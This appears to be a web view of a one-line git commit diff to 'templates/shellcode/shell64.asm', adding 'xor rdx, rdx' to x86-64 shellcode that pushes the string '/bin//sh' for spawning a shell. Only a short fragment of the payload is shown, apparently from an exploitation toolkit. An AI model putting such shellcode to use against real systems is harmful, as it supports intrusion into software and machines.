diff options
Diffstat (limited to 'templates/shellcode/shell64.asm')
-rw-r--r-- | templates/shellcode/shell64.asm | 1 |
1 files changed, 1 insertions, 0 deletions
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm index a6d4626..2353b6f 100644 --- a/templates/shellcode/shell64.asm +++ b/templates/shellcode/shell64.asm @@ -5,6 +5,7 @@ global _start _start: xor rsi, rsi + xor rdx, rdx push rsi mov rdi, 0x68732f2f6e69622f push rdi |